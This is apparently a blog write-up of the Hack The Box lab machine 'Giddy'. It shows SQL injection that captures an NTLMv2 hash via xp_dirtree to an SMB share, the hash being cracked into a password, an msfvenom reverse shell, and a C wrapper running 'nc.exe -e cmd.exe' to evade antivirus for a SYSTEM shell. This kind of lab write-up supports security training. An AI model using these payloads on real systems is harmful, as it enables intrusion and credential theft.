- Published on
Hack The Box - Giddy
Giddy is a medium windows box, getting initial shell is by grabbing the NTLMv2 hash of SMB from SQL injection. And Privilege escalation is by vulnerability in a software called Ubiquiti UniFi Video.
Link: https://www.hackthebox.eu/home/machines/profile/153
Let's Begin with our Initial Nmap Scan.
Nmap Scan Results:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_ssl-date: 2020-06-17T04:06:16+00:00; +4m24s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIDDY
| NetBIOS_Domain_Name: GIDDY
| NetBIOS_Computer_Name: GIDDY
| DNS_Domain_Name: Giddy
| DNS_Computer_Name: Giddy
| Product_Version: 10.0.14393
|_ System_Time: 2020-06-17T04:05:45+00:00
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2020-06-16T04:00:16
|_Not valid after: 2020-12-16T04:00:16
|_ssl-date: 2020-06-17T04:06:16+00:00; +4m24s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
HTTP Enumeration
Its an Normal webpage. except the image there is nothing here. So decided to run Gobuster.
Gobuster Scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.104
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/06/17 09:37:07 Starting gobuster
===============================================================
/aspnet_client (Status: 301)
/mvc (Status: 301)
/remote (Status: 302)
===============================================================
2020/06/17 09:45:40 Finished
===============================================================
/remote it asks me to change to HTTPS.
So I changed. It contains a Windows PowerShell Web Access interface
/mvc
While checking the webpage, The URL seems suspicious so I injected ' at the end and it throw some Sql error
SQL injection
First I tried getting the list of databases.
[11:14:57] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2016
[11:14:57] [INFO] fetching database names
available databases [5]:
[*] Injection
[*] master
[*] model
[*] msdb
[*] tempdb
I tried to dump some files and nothing seems like useful, so I started checking PayloadsofAllThings and got this.
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the
xp_dirtreefunction to list the files in our SMB share and grab the NTLMv2 hash.
Thats seems interesting. So started smbserver in my machine.
root@kali:~# smbserver.py pub `pwd`
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Captured the request and send that to repeater and used this payload.
; use master; exec xp_dirtree '\\10.10.14.9\w0lf';--
Within a few seconds, I got the hit with the Stacy hashes.
root@kali:~# smbserver.py pub `pwd`
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.104,49721)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:4141414141414141:09b4c8a04e8d49fc359f999b80ecb8f8:0101000000000000002168046f44d601772508716f1fa565000000000100100045007a007600660049006f00410063000200100071004f0044006c0077006c005a006e000300100045007a007600660049006f00410063000400100071004f0044006c0077006c005a006e0007000800002168046f44d6010600040002000000080030003000000000000000000000000030000085a0bcf3663d90e9d623b230dc8a6708fb2abaaf70f07892c7ea28974dd95ac00a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003900000000000000000000000000
[-] TreeConnectAndX not found W0LF
[-] TreeConnectAndX not found W0LF
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:4141414141414141:f06711943a731690a5e79d7291d8b616:010100000000000080b700056f44d6010d0cfea879d58e55000000000100100045007a007600660049006f00410063000200100071004f0044006c0077006c005a006e000300100045007a007600660049006f00410063000400100071004f0044006c0077006c005a006e000700080080b700056f44d6010600040002000000080030003000000000000000000000000030000085a0bcf3663d90e9d623b230dc8a6708fb2abaaf70f07892c7ea28974dd95ac00a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003900000000000000000000000000
[-] TreeConnectAndX not found W0LF
[-] TreeConnectAndX not found W0LF
I cracked the hash using john
root@kali:~/CTF/HTB/Boxes/Giddy# john --wordlist=/usr/share/wordlists/rockyou.txt stacy.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x (Stacy)
Using Responder
We can also user responder here
root@kali:~# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.0.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.9]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.10.104
[SMB] NTLMv2-SSP Username : GIDDY\Stacy
[SMB] NTLMv2-SSP Hash : Stacy::GIDDY:0f7b1c386378170c:AB85DABAB76A635227827447CC5268EC:0101000000000000C0653150DE09D20119DA4185143111FD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000030000085A0BCF3663D90E9D623B230DC8A6708FB2ABAAF70F07892C7EA28974DD95AC00A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003900000000000000000000000000
[*] Skipping previously captured hash for GIDDY\Stacy
[*] Skipping previously captured hash for GIDDY\Stacy
[*] Skipping previously captured hash for GIDDY\Stacy
[+] Exiting...
Getting User shell
We know /remote is running a Windows Powershell Web so I tried login with the credentials stacy : xNnWo6272k7x.
It worked
With the credentials I tried login in evil-winrm and It worked.
root@kali:~/CTF/HTB/Boxes/Giddy# evil-winrm -i 10.10.10.104 -u stacy -p 'xNnWo6272k7x'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacy
Privilege Escalation
When searching through the folders, I found unifivideo
*Evil-WinRM* PS C:\Users\Stacy\Documents> ls
Directory: C:\Users\Stacy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/17/2018 9:36 AM 6 unifivideo
UniFi Video is a powerful and flexible, integrated IP video management surveillance system designed to work with Ubiquiti’s UniFi Video Camera product line. UniFi Video has an intuitive, configurable, and feature‑packed user interface with advanced features such as motion detection, auto‑discovery, user-level security, storage management, reporting, and mobile device support.
I searched for any exploits available and found this.
First let's check the directory is present or not.
*Evil-WinRM* PS C:\Users\Stacy\Documents> cd C:\ProgramData\unifi-video\
*Evil-WinRM* PS C:\ProgramData\unifi-video> ls
Directory: C:\ProgramData\unifi-video
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/16/2018 9:54 PM bin
d----- 6/16/2018 9:55 PM conf
d----- 6/16/2018 10:56 PM data
d----- 6/16/2018 9:54 PM email
d----- 6/16/2018 9:54 PM fw
d----- 6/16/2018 9:54 PM lib
d----- 6/17/2020 12:04 AM logs
d----- 6/16/2018 9:55 PM webapps
d----- 6/16/2018 9:55 PM work
-a---- 7/26/2017 6:10 PM 219136 avService.exe
-a---- 6/17/2018 11:23 AM 31685 hs_err_pid1992.log
-a---- 6/17/2018 11:23 AM 534204321 hs_err_pid1992.mdmp
-a---- 8/16/2018 7:47 PM 0 hs_err_pid2036.mdmp
-a---- 6/16/2018 9:54 PM 780 Ubiquiti UniFi Video.lnk
-a---- 7/26/2017 6:10 PM 48640 UniFiVideo.exe
-a---- 7/26/2017 6:10 PM 32038 UniFiVideo.ico
-a---- 6/16/2018 9:54 PM 89050 Uninstall.exe
According to exploitdb Ubiquiti UniFi Video tries to execute a file called taskkill.exe in C:\ProgramData\unifi-video\ but there is no file exists here. So we can place our payload as taskkill.exe then restart the service. And because the service runs with privileged permissions , it will be excuted as administrator.
Created a payload using msfvenom
root@kali:~/CTF/HTB/Boxes/Giddy# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f exe > taskkill.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Started smb share in my machine and uploaded the taskkill.exe to the machine
I tried to copy the file to C:\ProgramData\unifi-video\ but it seems deleted. I think there is some kind of AV blocking this.
*Evil-WinRM* PS C:\Users\Stacy\Documents> copy taskkill.exe C:\ProgramData\unifi-video\
Cannot find path 'C:\Users\Stacy\Documents\taskkill.exe' because it does not exist.
At line:1 char:1
+ copy taskkill.exe C:\ProgramData\unifi-video\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Stacy\Documents\taskkill.exe:String) [Copy-Item], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyItemCommand
*Evil-WinRM* PS C:\Users\Stacy\Documents> ls
Directory: C:\Users\Stacy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/17/2020 2:52 AM 15 query
-a---- 6/17/2018 9:36 AM 6 unifivideo
Evading Antivirus
Since its blocking my payload I created a simple C program and compiled as exe that uses nc.exe and gives me shell.
#include[stdio.h](stdio.h)
#include[stdlib.h](stdlib.h)
int main()
{
system("nc.exe -e cmd.exe 10.10.14.9 1234");
return 0;
}
Started my SMB share again and uploaded nc.exe and taskkill.exe to the box.
*Evil-WinRM* PS C:\ProgramData\unifi-video> net use z: \\10.10.14.9\pub
The command completed successfully.
*Evil-WinRM* PS C:\ProgramData\unifi-video> copy z:\nc.exe .
*Evil-WinRM* PS C:\ProgramData\unifi-video> copy z:\taskkill.exe .
I tried to see the service but it don't have much privilege for that. After some googling I found that.
*Evil-WinRM* PS C:\ProgramData\unifi-video> Get-Service
Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ Get-Service
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-Service], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand
*Evil-WinRM* PS C:\ProgramData\unifi-video> Stop-Service "Ubiquiti UniFi Video"
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
*Evil-WinRM* PS C:\ProgramData\unifi-video> Start-Service "Ubiquiti UniFi Video"
Restarted the service
I got the shell
root@kali:~/CTF/HTB/Boxes/Giddy# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.104] 49757
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\ProgramData\unifi-video>whoami
whoami
nt authority\system
C:\ProgramData\unifi-video>cd C:\Users
cd C:\Users
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
We Own the System
Refernce: